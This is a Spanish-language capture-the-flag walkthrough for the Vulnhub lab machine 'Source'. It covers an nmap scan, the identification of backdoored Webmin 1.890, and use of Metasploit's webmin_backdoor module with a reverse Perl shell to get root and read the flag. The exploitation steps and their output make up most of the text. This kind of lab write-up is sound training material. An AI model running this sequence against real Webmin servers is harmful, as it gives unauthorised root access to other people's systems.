[VULNHUB] Source

Hoy vamos a hackear la maquina de Vulnhub llamada Source. Podeis descargarla desde el siguiente enlace: Source



Empezamos con un nmap para ver que puertos tiene abiertos.

sml@m0nique:~$ nmap -A -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-31 13:13 CEST
Nmap scan report for
Host is up (0.0013s latency).
Not shown: 65533 closed ports
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 
| ssh-hostkey: 
|   2048 b7:4c:d0:bd:e2:7b:1b:15:72:27:64:56:29:15:ea:23 (RSA)
|   256 b7:85:23:11:4f:44:fa:22:00:8e:40:77:5e:cf:28:7c (ECDSA)
|_  256 a9:fe:4b:82:bf:89:34:59:36:5b:ec:da:c2:d3:95:ce (ED25519)
10000/tcp open  http    MiniServ 1.890 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.45 seconds
Podemos ver que tiene MiniServ con la version 1.890, la cual tiene una backdoor si es de sourceforge.


Arrancamos metasploit.

Usaremos el modulo "exploit/linux/http/webmin_backdoor".

msf5 > use exploit/linux/http/webmin_backdoor
msf5 exploit(linux/http/webmin_backdoor) > show options

Module options (exploit/linux/http/webmin_backdoor):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format 
   RHOSTS                      yes       The target host(s), range CIDR 
identifier, or hosts file with syntax 'file:'
   RPORT      10000            yes       The target port (TCP)
   SRVHOST          yes       The local host or network interface to 
listen on. This must be an address on the local machine or to listen on 
all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing 
   SSLCert                     no        Path to a custom SSL certificate 
(default is randomly generated)
   TARGETURI  /                yes       Base path to Webmin
   URIPATH                     no        The URI to use for this exploit 
(default is random)
   VHOST                       no        HTTP server virtual host

Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be 
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)
Hacemos el "set" de los valores.

msf5 exploit(linux/http/webmin_backdoor) > set lhost
msf5 exploit(linux/http/webmin_backdoor) > set rhosts
msf5 exploit(linux/http/webmin_backdoor) > set ssl true
Y por ultimo, lanzamos el exploit!

msf5 exploit(linux/http/webmin_backdoor) > exploit

[*] Started reverse TCP handler on 
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened ( -> at 2020-07-31 13:38:38 +0200

uid=0(root) gid=0(root) groups=0(root)


cd /root
ls /root
cat /root/root.txt


Y con esto ya seriamos root de la maquina